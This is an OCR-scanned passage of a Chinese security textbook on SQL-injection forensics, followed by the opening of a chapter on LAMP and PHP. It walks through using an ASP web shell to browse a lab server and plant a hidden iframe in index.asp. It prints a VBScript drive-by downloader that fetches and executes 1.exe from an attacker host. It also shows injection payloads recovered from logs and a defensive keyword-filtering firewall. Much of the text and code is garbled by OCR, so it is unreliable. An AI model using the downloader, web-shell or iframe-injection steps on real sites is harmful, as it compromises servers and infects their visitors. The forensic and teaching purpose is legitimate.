在 Function 列表 框 选 择 Get Drivers, 如 图 4-44 所 示 。 单 击 Send 按钮 得 到 如 图 4-45 
所 示 的 结果 。 可 见 服 务 器 端 C 盘 NTFS 格式 、 容 量 为 4.87GB, 可 用 2.31GB;F 盘 NTFS 
格式 、 容 量 为 5. 1GB, 可 用 5. 07GB。 


EE The eval() function ASP BackDoor Client - 了 icrosoft Internet Ex--- 加 回回 
辟 


文件 中 ”编辑 如 ”查看 如 收 着 (AN) 工具 CD) 下 助 如 
@ 旨 -日 - 国 固 久 户 时 六 加 全 -党国 沪 


地 址 加 ) | 稳 C:\one. htn 国 和 到 诈 拉 >” 


Enjoy Hacking! 


The URL: [http://192. 168.0.3/aa asp Password: EE 
Function: | Get Drives ~ | 
| 
EJ 
BE 是 我 的 电脑 


图 4-44 获得 驱动 器 列表 
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文件 四 ”编辑 E) 查看 轨 ”收藏 由 工具 中 帮助 0 


介 - 且 国 久 时 六 加 于- 痘 国 六 


起 http://192. 168.0.3/a4 asp 


Get Drives 
Name VolumeName Type |IsReady FileSystem AvailableSpace TotalSize SerialNumk 
A Not Ready 
FIXED True NIFS 2.31 6 4.87 6 1686656977 
Not Ready 
FIXED True NIFS 5.07 6 5.1 6 -166778155— 


国 Internet 


图 4-45 驱动 器 列表 


3. 查看 服务 器 网 站 主 目录 下 的 文件 
在 Path 部 分 输入 网 站 主 目录 位 置 e:\aaa, 如 图 4-46 所 示 , 单 击 Send 按钮 。 得 到 如 
图 4-47 所 示 的 网 页 文件 列表 ,选择 index. asp 植 和 人 挂 马 代码 。 
加 The eval() function ASP BackDoor Client — Nicrosoft Internet Ex... 


文件 人 ) 编辑 E) 查看 WD 收藏 和 ) 工具 CD) 帮助 00) 


@a 和 -日 国 回 的 Pr 六 mx @ 会 -对 国 六 
地 址 四) | 稳 C:\one. htn 


Enjoy Hacking! 
‘The URL: Phttp:/7192. 168.0 3/an asp Password 


Punetion: [Tile List ~ 


Path: [e: vaaa 


图 4-46 查看 网 站 主 目录 


加 http://192- 168.0.3/aa.asp — Nicrosoft Internet Explorer 
文件 @) ”编辑 下 ) 查看 G) 收藏 人 工具 CD) 帮助 如 


gouwu. asp 2006-8-29 
hot. asp 2006-8-29 


idea. asp 2006-8-29 
index. asp 2008-4-21 
left. asp 2006-8-29 
liuyan. asp 2006-8-29 
login. asp 2006-8-29 
lookcomment. asp 2006-8-29 


4-47 主 目录 下 的 网 页 文件 列表 
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4 在 indexasp 中 植 入 挂 马 代码 

在 Function 中 选择 Edit TextFile 项 ,Path 参数 输入 e:\aaa\index. asp, 如 图 4-48 所 
示 , 点 击 Send, 可 以 获得 index. asp 的 源 代码 ,如 图 4-49 所 示 。 在 index. asp 的 源 代码 中 
植 信 挂 马 代 码 : 


< iframe src= “http://192 168.0.5/1.html”: width= “0” height= “0" frameborder= 
“0°> < /iframe> 


如 图 4-50 所 示 然 后 单 击 Send 按钮 ,修改 后 的 index. asp 会 被 传 回 服务 器 并 覆盖 原文 
件 。 这 句 挂 马 代 码 中 的 width height 和 frameborder 均 设置 为 0, 这 样 用 户 看 到 的 页 面 和 
之 前 的 正常 页 面 完全 相同 ,192. 168. 0. 5 是 攻击 者 使 用 的 一 台 Web 服务 器 ,攻击 者 已 经 
预先 在 这 台 Web 服务 器 的 主 目录 上 放置 了 一 个 1. html 和 一 个 木马 客户 端 1. exe。 受 害 
者 在 浏览 被 挂 马 的 index. asp 时 ,他 的 IE 浏览 器 会 自动 从 192. 168. 0. 5 这 台 服 务 器 下 载 
1. html, 这 个 文件 的 内 容 见 图 4-51 所 示 , 通 过 分 析 可 知 ,这 组 代码 是 利用 匡 浏览 器 的 漏 
洞 , 引导 受害 者 从 192. 168. 0. 5 服务 器 下 载 . 运 行 木 马 客 户 端 1. exe, 如 果 受 害 者 的 IE 浏 
The eval() function ASP BackDoor Client - Wicrosoft Internet Ex... 有 E|El 罗 | 
文件 如 ”编辑 于 ) 查看 WD 收 总 各 工具 CI) 帮助 0 忌 


@om- 日 -国信 Pe 六 mx 加 | 会- 马 国 总 


入 | cone htm 


Enjoy Hackine! 


The URL: [http://192. 168.0. 3/aa. asp Password: |a 


Function: |Edit TextFile ~ 


了 dithyiew TextFile 


Path: [CeaaVindex as ] 


图 4-48 查看 index. asp 的 源 代码 


E AT 
文件 FE) 编辑 人 E) 查看 Y) 收藏 ) 工具 CD) 帮助 0 


-日 : 国 鸭 时 交加 | 卫 - 党 国志 


地 址 中) | 四 http://192.168.0.3/aa asp 


The File e:\aaa\index. asp Content: 


<htnl> 
<head> 
<meta http-equiv="Content-Type” content="text/htnl; charset=gb2312 “> 
人 title> 电 子 商 城 </title> 
/head> 
body> 
《I—#include file="include/conn. asp” —> 
able width="792” border="0"” alien="center” cellvaddine="0” cellspacine="0"> 兰 


天 完毕 鸭 Internet 


图 4-49 index. asp 的 源 代码 
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文件 @) 编辑 人 E) 查看 他 收 豪 &) 工具 CD) 帮助 00 


@ 二 -日 - 国 国 信 Par 六 vmx @| 全 -对 


地 址 加) | 莉 http://192.168.0.3/aa asp 


The File e:\aaa\indexr.asp Content: 


<html> 

head> 

《iframe src="http://192.168.0.5/1.html”; 

fifrane> 

<meta http-equiv="Content-Type” content="text/html; charset=gb2312"> 

<title> 电 子 商城 title 让 

head> 

body> 
< 


width= “0” height="0"” frameborder="0"> 


在 为 index. asp 植 人 挂 马 代 码 时 ,可 能 遇 到 写 人 失败 的 情况 , 立 


图 4-50 植 入 挂 马 代 码 


文件 到 ) 编辑 区 ) 格式 0) 查看 WW 帮助 0 


<htnl> 

《script language=“ VBScript”> 
on error resune next 

dl = “http://192. 168.0. 5/1. exe” 

Set df = ER createEIement (“ob’&” ject”) 

df. setAttribute “classid 四 “clsid:BD96C55“& “6-65A3-11D0-983A-00CO4FC29E36 
str= “Microsoft"&”. KILHTIP™ 

Set x = df.CreateObject(str, ““) 
al=“Ado” 

a2= “db.“ 

a3="Str’&" ea” 

strl=al&a2&a3 

str5=strl 

set S = df.createobject(str5& rm 


,) 


x. Open str6, dl, False 
Send 

fnanel="g01d’&”. com” 

set F = df, createobject(’Scripti’g ng, FilesystenObject”, 
set tnp = F.GetSpecialFolder (2) 

5. open 

fnanel= F.Buildpath (tmp, fnane1) 

5S. write x,.responseBody 

5. savetofile fnamel,2 

S.close 

set Q = df.createobject(“Shell. Ap’&’plication”, “) 

Q. ShellExecute fnanel,”,””, “ope &’n 0 

/script> 


“,) 


图 4-51 1.html 的 源 代码 


迹 分 析 


这 时 服务 器 返回 如 图 4-52 


所 示 没 有 权限 的 错误 提示 。 这 是 因为 攻击 者 是 以 Internet 来 宾 账 户 ( 即 IUSR_* * ) 的 
身份 来 运行 aa. asp 中 的 代码 ,由 于 这 个 账户 没有 写 入 权限 ,因而 导致 写 入 失败 。 在 这 种 
情况 下 可 采用 其 他 方法 植 人 木马 。 


443 


线索 调查 


攻击 者 入 侵 成 功 之 后 ,入 侵 痕迹 会 遗留 在 受害 者 主机 的 不 同位 置 。 本 节 我 们 将 学 习 
从 数据 库 事务 日 志 、 操 作 日 志 、 应 用 程序 日 志和 Web 日 志 中 寻找 出 这 些 痕 迹 。 
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恒 无 法 显示 网 页 - icrosoft Internet Explorer 
文件 @) ”编辑 下 ) 查看 WW) 收 诚 工具 CI) 帮助 0D 


所 -上 日- 轩 国 多 有 时 六 Wx 加 全- 学 辕 


地 址 9) 旋 http://192. 168.0.3/aa asp 


技术 信息 5 用 于 支持 人 员 ) 


。 错误 类 型 ; 
有 erosoft VBScript 运行 时 错误 (0x800A0046) 
没有 权限 


faa. asp 


。 浏览 器 类 型 : 


Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SY1) 


图 4-52 没有 修改 index. asp 的 权限 


1. 查看 SQL Server 数据 库 的 事务 日 志 
图 4-53 所 示 是 2012-3-17 当天 的 SQL Server 数据 库 事务 日 志 , 从 中 可 以 清晰 看 到 攻 
击 者 差异 备份 shop 数据 库 的 全 过 程 。 


012-03-17 10:59:58.70 


[O2012-03-17 11:00:30.68 


| 峙 日 期 时 间 )》 :2012/03/14 (05;46:13) ,第 一 个 LSN，16:310;1， 最 后 一 个 LSN， 16 
* from [shangpin] where id=50; declare @a sysnane, @s nvarch 


backup BACKVP 未 能 完成 命令 
| 国 z012-03-17 11:00:30.81 backup BACKUP 未 能 完成 命令 select * from [shangpin] where id=50; declare Ba sysnane,@s nvarch 
| 国 2012-03-17 11:00:30.84 backup BACKUP 未 能 完成 命令 select * from [shangpin] where id=50; declare @a sysnane,@s nvarch 


2012-03-17 11:00:30. 90 backup _ 日 志 已 备份 :数据 库 ，shop ,， 创 娃 日 期 (时 间 》: 2012/03/14 (05:46:13) ,第 一 个 LSN: 16:333:1， 最 后 一 个 LSN; 16 


图 4-53 SQL Server 数据 库 事务 日 志 


如 图 4-54 所 示 ,2012-3-17 10:59:56. 65 执行 了 备份 shop 数据 库 命 令 ,2012-3-17 10: 
59;56.70 shop 数据 库 被 成 功 备份 到 C:\Program Files\Microsoft SQL Server\MSSQIAN 
BACKUP\shop。 通 过 客户 提交 的 代码 可 以 断定 攻击 行为 。 


SQL Server 错误 日 志 消息 贺 | ser server 错误 日 志 消息 


数据 文件 | 


SQL Server 异 误 日 志 消 息 SQL Server 错 误 日 志 消息 


backup 
2012.03:17 10:59:56.65 


BACKUP 未 能 完成 命令 select "fom [eerpenl 

where id=50,declare @a sysname,@s nvarchar 

[4000) select @a=db_name 
0@s=0x730088008FD07000 backup log @a to 

disk = @s with inibno_tuncate 一 


swy | 


关闭 @ 


backup 
2012031710595670 


日 志 已 备份 : 数据 库 : shop， 创建 日 期 (时 间 ) : 

2012703/14105.4613)， 第 一 个 LSN: 16:310:1 
一 个 LSN; 16.3331， 转 鱼 设 备 的 数目 : 1， 

设备 信息 : FILE=1. TYPE-DISK {C:\Program 


图 4-54 备份 shop 数据 库 


如 图 4-55 所 示 ,2012-3-17 11:00:30. 84 差异 备份 shop 数据 库 , 于 2012-3-17 11:00: 


30. 90 shop 数据 库 被 成 功 备 份 到 e:\aaa\aa. asp,aa. asp 中 包含 


132 


“一 句 话 木 马 ”。 通 过 分 析 


ma 第 4 章 SQL 注入 攻击 的 痕迹 分 析 mm 


SQL Server 数据 库 的 事务 日 志 可 以 发 现 攻击 行为 和 时 间 , 但 攻击 者 的 IP 地 址 等 直接 线 
SQL Server 错误 日 志 消息 辆 | ser server 错误 日 志 消 息 
数据 文件 | 


SQL Server 错 误 日 志 消 息 恒久， saL seve 博 误 日 志 消息 


backup backup 
2012.03-17 11:00:30.84 2012-03-17 11:00:30.30 
el select” En [shangpnl 2 日 志 已 备份 : 数据库: shop， 创建 日 期 ( 时间 ) : 


2012/03/14[05.46.13]， 第 一 个 LSN: ed ’ 
a LSN; 16:344.1， 转 储 设备 的 数目 : 1 
息 : [FILE=1. TYPE=DISK: fe\aaavaa， ap 


au | am | 
关闭 加 关闭 @) | 
图 4-55 差异 备份 shop 数据 库 


2. 查看 SQL Server 数据 库 的 操作 日 志 
使 用 Log explorer 可 以 查看 到 攻击 者 向 tmpl 数据 表 插入 一 句 话 木马 的 过 程 。 如 
图 4-56 所 示 ,在 2012-3-17 11:00:10. 467 客户 向 tmpl 数据 表 插 入 一 句 话 源 代码 。 


ime DpCode | SPID 
03-17 11:00:10.467 b23 INSERT_ROWS | 53 DML 
03.17 11:00:10.467 0 3 COMMIT_XACT 53DML 


0x3c256578656375746528726571756573742822612225 


图 4-56 向 tmpl 表 插 入 一 句 话 木马 


使 用 Log explorer 可 以 查看 到 创建 tmpl 数据 表 的 DDL 的 日 志 , 如 图 4-57 所 示 。 


CREATE TABLE [dbo] [tmp] (lemd] IMAGE) 


CREATE TABLE [d cmd] IMAGE] 


Em 
Te Tranad pooge Te NUsename [UD SPD [De 
Vo317105929123 000000000616 IINSERT-AOWS | dbo.sysobiects dbo |53 |tmpl 
he | un | save | 
I LSN: 1013eb [OBJECT I0: 1829581556 


图 4-57 创建 tmpl 数据 表 的 DDL 日 志 


3. 查看 操作 系统 记录 的 应 用 程序 日 志 
如 图 4-58 所 示 ,2012-3-17 10:59:56 执行 了 备份 shop 数据 库 命令 ,2012-3-17 10:59: 
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56shop 数据 库 被 成 功 备份 到 C:\Program Files\ Microsoft SQL Server\ MSSQL\ 


BACKUP\shop。 通 过 客户 提交 的 代码 可 以 断定 攻击 行为 。 


事件 详细 信息 


日 期 @): 2012-3-17 来 源 人 ) MSSQLSERYER 
时 间 如 : ”10:59:56 类别 @@) 名 ) 

类 型 E): 错误 事件 ID (I); 17055 

用 户 W: WA 

计算 机 四 ): 并 


描述 中 


全 

ACKUP 未 能 完成 命令 select *# from [shangpin] where id= 
0 declare Ba sysnane, @s nvarchar (4000) select 
a=db_nane 0, @s=0x730088008F007000 backup log Qa to 
disk = Qs with init no_truncate;—— 


关 更 多 信息 ， 请 从 轩 在 
当知 ;守节 如 O 字 0 


事件 详细 信息 


日 期 @): ”2012-3-17 来 源 G) MSSQLSERVER 
10:59:56 类别 @) 6) 
信息 事件 ID(I); 17055 


; WA 


e265: 

日 志 已 备份 : 数据 库 : shop, 创建 日 期 《时间 ) : 2012/03/14 

(05;46;13) ,第 一 个 LSN: 16:310;1, 最 后 一 个 LSN; 

|16:333;1， 转 储 设备 的 数目 : 1， 设 备 信息 : (FILE=1, 
PE=DISK: {C:\Progran Files\Microsoft SQL Server 


| 国 


一 一: 


国 


| 大 山本 


CaO DO 


图 4-58 在 应 用 程序 日 志 中 备份 shop 数据 库 的 记录 


如 图 4-59 所 示 ,2012-3-17 11:00:30 差异 备份 shop 数据 库 , 于 2012-3-17 11:00:30 
shop 数据 库 被 成 功 备份 到 e:\aaa\aa. asp,aa. asp 中 包含 一 句 话 木马 。 通 过 分 析 应 用 程 


序 日 志 可 以 发 现 攻击 行为 和 时 间 ,但 攻击 者 的 IP 地 址 等 直接 线索 并 未 发 现 。 


事件 详细 信息 | 

日 期 &): ”2012-3-17 来 源 (3): MSSQLSERVER + 
时 间 如 ;11:00:30 类别 @@) (6) 

类 型 情 误 事件 DQD): 17055 
有 用户: WA 此 
计算 机 中) ; 和 2 


[BACKUP 未 能 完成 命令 select * from [shangpin] where id 
(50; declare Qa sysnane, @s nvarchar (4000) select 
|@a=db_name 0, @s= 
|oxsso03A005C006100810061005C00610061002EB00610073007000 
lbackup log Qa to disk-@s with init no_truncate;— 


| 事件 详细 信息 | 
| 日 期 9): ”2012-3-17 来 源 (5):; MSSQLSERYVER 
| 时间; 11:00:30 类 别 @): 6) 
类 型 EE): 信息 事件 ID (OD): 17055 
| 用 户 WD: WA 
计算 机 @): XP 


日 志 已 备份 ;数据库 ，shop , 包 肤 日 期 ( 时间) : 2012/03/14 
+， 第 一 个 LSH: 16:333;1， 最 后 一 个 LSN; 


PE=DISK: {e:\aaa\aa asp’ }), 


Ee _ 关 更 多 信息 ， 请 参阅 在 

数据 中 @ 字 节 @@) 品 字 四 | 当知 中: 加 季节 @) 口 字 四 

0000: el Ob 00 00 10 00 00 00 6 | joooo: 59 47 00 00 0a 00 00 00 

0008: 03 00 00 00 58 00 50 00 2 58 00 50 00 

0010: 00 00 05 00 00 00 73 00 ss,. 00 00 00 73 00 
证 _] [取消 _] | 5 


图 4-59 在 应 用 程序 日 志 中 差异 备份 shop 数据 库 的 记录 


4 查看 服务 器 端的 Web 日 志 
图 4-60 所 示 是 在 服务 器 端 查看 到 的 Web 日 志 , 从 中 可 见 攻 击 的 全 过 程 ,包括 客户 
IP\ 时 间 ,\ 链 接 、SQL 命令 等 。Web 日 志 容量 通常 很 大 ,可 以 通过 搜索 关键 字 的 方法 快速 
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定位 记录 ,如 DELETE .exec 等 。 


下 ex120317 - 记事 本 


文件 中 编辑 下 ) 格式 @@) 查看 WW) 帮助 人 D 
82:59:29 192.168.8.2 GET /lookpro.asp id=58;create%28table%28tmp1%28(cmd%26%28inage);--|163|866a 六 
82:59:56 192.168.8.2 GET /lookpro-asp id=58;declare%28Qa%28sysnane,@s%28nvarchar (4088)%28select% 
63:99:19 192.168.8.2 GET /lookpro.asp id=58;insert%28into%28tmp1(cmd)%28values( 8x3C2565786563757 
63:99:39 192-168-9-2 GET /lookpro.asp id=58;declare%28Qa%28sysnane ,@s%28nvarchar (4888)%26select% 疯 
< > 


图 4-60 Web 日 志 中 遗留 的 人 侵 痕 迹 


丰 局 通过 ASP 注入 防火 墙 来 预防 SQL 注入 


“SQL 注入 攻击 ?是 由 于 开发 网 站 的 技术 人 员 缺 乏 足 够 的 网 络 安全 意识 ,未 对 用 户 提 
交 的 参数 进行 严格 的 检查 ,就 将 参数 直接 提交 给 后 台 的 数据 库 运行 ,这 些 参数 里 面 可 能 包 
含 黑 客 提交 的 恶意 指令 ,通过 在 被 人 侵 网 站 上 执行 这 些 指令 ,黑客 可 以 达到 完全 控制 网 站 
的 目的 。 在 网 站 已 经 开发 完成 并 且 存 在 SQL 注入 漏洞 的 情况 下 ,为 了 防止 SQL 注入 通 
常 采用 ASP 注入 防火 墙 。 客 户 提交 给 服务 器 的 参数 首先 由 ASP 注入 防火 墙 进行 检查 ， 
如 含有 非法 字符 , 则 终止 通信 并 记录 攻击 源 信息 ;如 参数 合法 , 则 将 合法 参数 提交 给 有 具体 
页 面 处 理 , 通 过 这 种 方法 可 以 比较 有 效 地 防止 SQL 注 和 攻击。 下面 给 出 的 是 一 款 ASP 
注入 防火 墙 fzr. asp 的 源 代码 ,将 fzr. asp 放 在 网 站 的 主 目录 下 ,然后 在 每 个 需要 保护 的 网 
页 文件 头 部 添 这 条 语句 并 在 文件 程序 代码 开头 添加 一 条 调用 SQL 防 注入 程序 的 命令 
“过 1--#include file 一 "fzr. asp" 一 二 ”, 那 么 这 个 网 页 就 受到 ASP 注入 防火 墙 的 保护 。 

参数 Fy_In 中 包含 了 所 有 可 能 的 非法 字符 串 ,各 个 字符 串 之 间 用 “| "分隔 。Request. 
QueryString 中 保存 了 客户 通过 GET 方法 提交 给 服务 器 的 所 有 参数 。 程 序 通 过 FOR 循 
环 结构 依次 每 个 参数 ,然后 判断 其 中 是 否 包含 非法 字符 串 ,如 包含 则 将 攻击 源 的 相关 信息 
记录 到 文本 读 取 文件 中 ,同时 对 攻击 者 给 出 警告 。 

<% 

Dim Fy_Post, Fy_Get, Fy_In, Fy_ Inf, Fy_Xh, Fy_db, Fy_dbstr 

Dim fsol, all_tree2, filel, files, filez, fs1, zruserip 

If Request. QueryStr ing< > ” Then 

Fy_Inr= ”|:|% | * |and| exec| insert| select | delete| update | count | chr | mid| master | truncate | char | declare| 


script 
Fy_Inf= split (Fy_In, |”) 
For Each Fy_Get In Request. QueryString 
For Fy_Xh= 0 To Ubound Fy_Inf) 
If Instr (Case (Request. QueryString fy_Get)),Fy_Inf (Fy_Xh))< > 0 Then 
zruser ip= Request. ServerVar iables (‘HTTP_X_FORWARDED FOR”) 
If zruserip= ”Then 
zruserip= Request. ServerVar iables (REMOTE_ADDR’) 
Response.Write "内容 含有 非法 字符 请 不 要 有 ”或 and 或 or 等 字符 ,请 去 掉 这 些 字 符 再 发 1IKbr>” 
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Response.Write “如 是 要 攻击 网 站 ,系统 记录 了 你 的 操作 y《br> 
Response Write “操作 IP:“&zruserip&“<br>” 
Response .Write “操作 时 间 :“&Now&< br>” 
Response.Write “操作 页 面 : “8&Request. ServerVariables(URL”)&< br>” 
Response.Write “提交 方式 : GET< br>” 
Response.Write "提交 参数 : “8Fy_Get&<br>” 
Response.Write "提交 数据 :“&Request. queryString fy_Get) 
set fsol= Server. Create0bject (Scripting. FileSystemr0bject ?7 
all_tree2= server. mappath( fhack )&\” 
if (fsol.FolderExists (all_tree2)) then 
else 
fsol. CreateFolder (al|_tree2) 
end if 
filel= zhan_riqi (now) 
files= filel&. txt” 
filez= all_tree2& \“&files 
"dim fsol, fs 
set fst= fsol. CreateTextFi le (filez, 2, true) 
fst.write “操作 IP: “8&zruserip& wbcr1f 
fst.write “操作 时 间 : “&Now & vbcr1f 
fst.write “操作 页 面 : “8&Request. ServerVariables (URL”) & vbcrlf 
fst.write “提交 方式 : GET” & vber lf 
fsl.write “提交 参数 : “8Fy_Get & vbcr1f 
fsl.write “提交 数据 : “8&Request. QueryString(Fy_Get) 
fsl.close 
set fs1= nothing 
set fsol= nothing 
Response. Write “< Script Language= JavaScript> alert( 内 容 含 有 非法 字符 ! 不 要 攻击 我 们 ,大 家 都 不 容易 
啊 !11);< /Seript>” 
Response. End 
End If 
End If 
Next 
Next 
End If 
function zhan_riqi (shi jian) 
Dim s_year,s_month, s_day, s_hour, s_minute, s_ss 
s_year= year (shi jian) 
if len(s_year)= 2 then s_year= 20"&s_year 
s_month= month (shi jian) 
if s_month< 10 then s_month= “0’&s_month 
s_day= day (shijian) 
if s_day 10 then s_day= “0'&s_day 
s_hour= hour (shi jian) 
if s_hour 10 then s_hour= "0&s_hour 
s_minute= minute (shi jian) 
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if s_minute< 10 then s_minute= "0 &s_minute 

s_ss= second (shi jian) 

if s_ss< 10 then s ss= “0'&s ss 

Zhan riqi=s year &s month&s day &s hour &s minute &s ss 
end function 

%> 


下 面 进行 测试 ,将 fzr. asp 放 在 网 站 的 主 目录 下 ( 即 E:\aaa) ,在 lookpro. asp 的 头 部 
添加 二! 一 #include file 二 "fzr. asp" 一 之 ,如 图 4-61 所 示 。 


荐 lookpro. asp - 记事 本 
文件 下) 编辑 于 ) 格式 Q) 查看 WW 帮助 00) 
《<!--#include file="fzr.asp” --> 


<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<title></title> 


《style type="text/css"> 
P= 

.Style1 {color: #F2ab5b} 
-style2 4| 


< 


图 4-61 在 lookpro. asp 头 部 挂 载 注 入 防火 墙 


在 客户 机 IE 浏览 器 地 址 栏 中 输入 包含 恶意 指令 的 语句 进行 测试 http://192. 168. 0. 
3/lookpro. asp? id = 50; DROP TABLE regtmp; CREATE TABLE regtmp (value 
nvarchar(4000) NULL, data nvarchar(4000) NULL) ;-- ,客户 端 弹出 一 个 提示 框 , 如 
图 4-62 所 示 。 同 时 ,可 以 查看 到 服务 器 返回 的 警告 信息 ,如 图 4-63 所 示 。 

来 自 网 页 的 消息 


以 内 容 合 有 非法 字符 * 不 要 攻击 我 们 ， 大 家 都 不 容易 啊 * 人 


图 4-62 客户 端 弹出 的 提示 框 


/Shttp://192. 168. 0. 3/Lookpro- asp?id=50:DROP TABLE regtap:CREATE TABLE regtap(value mva--- 同上 回 固 
OO- 图 ww /192. 168. 0. 3/1ookpr 外 ivseea | 
文件 FE) 编辑 于 ) 查看 站 ” 收 疗 来 如 ) 工具 I) 帮助 00 

次 收藏 严 | 次 居 时 取 同 站 。 居 免费 hotnsil 加 月 快讯 有 
| BMtp://192.188.0. 3/1ookpro. asp7id=S0: DEOP. 河 丛 - 品川 ”页 面 人 -安全 外 ”工具 中 - 增 - 


内 容 含有 非法 字符 | 请 不 要 有 ' 或 and 或 or 等 字符 ， 请 去 掉 这 些 字符 再 发 | 1 


如 是 要 攻击 网 站 ， 系 统 记录 了 你 的 操作 | 


/lookpro. asp 
GET 


交 : id 
提交 数据 ，50; DROP TABLE regtmp;CREATE TABLE regtmp (value nvarchar (4000) NULL, data nvarchar 
(4000) NULL) ; 一 


@ Internet 有 -| 轧 100% ， 


图 4-63 服务 器 返回 的 警告 信息 
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在 服务 器 的 网 站 主 目录 下 会 形成 一 个 以 攻击 时 间 命名 的 TXT 文件 ,其 中 记录 了 本 
次 攻击 的 详细 信息 供 网 站 管理 员 分 析 , 如 图 4-64 所 示 。 


外 20120319085614.txt - 记事 本 


文件 下 ) 编辑 到) 格式 0) 查看 帮助 如 
: 192.168.0.2 
间 ，2612-3-19 8:56:14 
: /lookpro.asp 
GET 


:1 id 
+ SQ;DROP TABLE regtnp;CREATE TABLE regtmp(ualue nvarchar(4888) NULL,data nvarchar(4888) NULL);-— 


图 4-64 服务 器 端 记录 的 攻击 信息 


习 题 4 


. 请 曾 述 什么 原因 造成 网 站 遭受 SQL 注入 攻击 ? 

. 黑客 对 网 站 进行 SQL 注入 攻击 的 最 终 目 的 是 什么 ? 
. 请 说 明 手 工 SQL 注入 攻击 的 步骤 是 什么 ? 

通过 SQL 注入 攻击 可 对 网 站 造成 哪些 危害 ? 

. 通过 查找 资料 ,了 解 哪些 方法 可 防范 SQL 注入 攻击 ? 


SN 
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5.1 LAMP 平台 简介 


LAMP 平台 是 由 Linux、Apache、MySQL 及 PHP 组 成 的 企业 网 站 应 用 平台 ,能 够 提 

供 动态 的 Web 站 点 服务 。 由 于 其 中 的 每 个 软件 都 是 开源 的 , 且 它 们 之 间 具 有 和 良好 的 兼容 

性 及 运行 稳定 性 ,该 平台 目前 被 大 多 数 中 小 企业 网 站 所 采用 。LAMP 平台 由 几 个 组 件 组 
成 , 呈 分 层 结构 ,每 一 层 都 提供 了 整个 软件 栈 的 一 个 关键 部 分 。 

其 中 ,Linux 处 在 最 低层 ,提供 操作 系统 。 其 他 每 个 组 件 实际 上 也 在 其 上 和 运行。 但 

是 ,并 不 一 定局 限于 Linux, 如 有 必要 ,其 他 操作 系统 也 可 以 实现 ,如 Windows 或 UNIX。 

次 低层 是 Apache, 它 是 一 个 Web 服务 器 。Apache 提供 可 让 用 户 获得 Web 页 面 的 机 制 。 

PHP 作为 服务 器 端 脚 本 解释 器 实际 上 是 作为 动态 模块 嵌入 在 Apache 中 的 。MySQL 提 

供 LAMP 系统 的 数据 存储 端 。 有 了 MySQL, 便 可 以 获得 一 个 非常 强大 的 、 适 合 运行 大 型 

杂 站 点 的 数据 库 。 在 Web 应 用 程序 中 ,所 有 数据 .产品 .账户 和 其 他 类 型 的 信息 都 存放 
在 这 个 数据 库 中 ,通过 SQL 语言 可 以 很 容易 地 查询 这 些 信 息 。 


82 PHP 概述 


超级 文本 预 处 理 语言 (Hypertext Preprocessor, PHP) 是 一 种 HTML 内 艇 式 的 语 
言 ,PHP 与 微软 公司 的 ASP 颇 有 几 分 相似 ,都 是 一 种 在 服务 器 端 执 行 的 嵌入 HTML 
文档 的 脚本 语言 ,语言 的 风格 有 类 似 于 C 语言 ,现在 被 很 多 的 网 站 编程 人 员 广 泛 的 
运用 。 

521 什么 是 PHP 

从 语法 上 看 ,PHP 语言 近似 于 C 语言 。 可 以 说 ,PHP 是 借鉴 C 语言 的 语法 特征 ,由 
C 语言 改进 而 来 的 。 可 以 混合 编写 PHP 代码 和 HTML 代码 ,不 仅 可 以 将 PHP 脚本 巾 
入 到 HTML 文件 中 ,甚至 还 可 以 把 HTML 标签 也 嵌入 在 PHP 脚本 里 。 以 下 是 可 以 采 
用 的 几 种 方法 : 
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XV 

《3?Bp…2> 

《script language= “php > "< /script> 

区 多 …%> 

注意 : 当 使 用 “二 ? …? 二 ”将 PHP 代码 嵌入 于 HTML 文件 中 时 ,可 能 会 同 XML 
发 生 冲突 。 同 时 ,能 否 使 用 这 一 缩减 形式 还 取决 于 PHP 本身 的 设置 。 为 了 可 适应 
XML 和 其 他 编辑 器 ,可 在 开始 的 问号 后 面 加 上 php 使 PHP 代码 适应 于 XML 分 析 器 ， 
如 二 ? php…? 之。 可 以 像 写 其 他 脚本 语言 那样 使 用 脚本 标记 ,如 “一 script language 一 
"php">*…<=/script>”。 

为 了 对 PHP 技术 有 一 个 直观 的 认识 , 先 来 看 一 个 非常 简单 的 PHP 页 面 及 其 运行 效 


果 。 以 下 是 helloWorld. php 的 源 代码 。 


<HMW> 

< HEAD> 

“TITLE> 

<? 

echo “Hello World!”; 
Wy 

<“/TITLE> 

< HEAD> 

< BODY> 

《HI> 

First PHP page 
“/HI> 

《HR> 

的 汪 

echo “Hello World! 


加 恨 -加 -曲目 四 | 甩 扩 守 收 V 天 如 | 全 -总 国 -> 
| 地址 (D) | 乱 ] http://192.168.157.128/heloworid.php EISEIILED 


First PHP page 


Hello World! 


图 5-1 helloWorld. jsp 运行 效果 
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522 PHP 特点 


用 PHP 做 出 的 动态 页 面 与 其 他 的 编程 语言 相 比 ,PHP 是 将 程序 嵌入 到 HTML 文档 
中 去 执行 ,执行 效率 比 完全 生成 HTML 标记 的 CGI 要 高 许多 ;与 同样 是 嵌入 HTML 文 
档 的 脚本 语言 JavaScript 相 比 ,PHP 在 服务 器 端 执行 ,充分 利用 了 服务 器 的 性 能 ;PHP 执 
行 引 擎 还 会 将 用 户 经 常 访问 的 PHP 程序 驻 留 在 内 存 中 ,其 他 用 户 再 一 次 访问 这 个 程序 
时 就 不 需要 重新 编译 程序 了 ,只 要 直接 执行 内 存 中 的 代码 就 可 以 了 ,这 也 是 PHP 高 效率 
的 体现 之 一 。PHP 具有 非常 强大 的 功能 ,具有 如 下 特点 : 


1. 运行 速度 快 
PHP 是 一 种 强大 的 CGI 脚本 语言 ,语法 混合 了 C 语言 Java、Perl 和 PHP 式 的 新 语 
法 ,执行 网 页 比 CGI、Perl 和 ASP 更 快 。 


2 具有 开放 性 和 可 扩展 性 
PHP 属于 开源 软件 ,其 源 代码 完全 公开 ,可 从 PHP 官方 站 点 (http://www. php. 
net) 自 由 下 载 ,任何 程序 员 为 PHP 扩展 附加 功能 非常 容易 。 


3. 支持 多 种 数据 库 

PHP 支持 多 种 主流 与 非 主 流 的 数据 库 , 如 DBA、dBase、Informix、InterBase、mSQL、 
MySQL Microsoft SQL Server、Sybase、.ODBC 、Oracle、PostgreSQL 等 。 其 中 , PHP 与 
MySQL 是 现在 绝 佳 的 组 合 , 它 们 的 组 合 可 以 跨 平台 运行 。 


4. 面向 对 象 编程 
PHP 提供 了 类 和 对 象 。 为 了 实现 面向 对 象 编程 ,PHP4 及 更 高 版 本 提供 了 新 的 功能 
和 特性 ,包括 对 象 重 载 .引用 技术 等 。 


5. 版 本 更 新 速度 快 。 

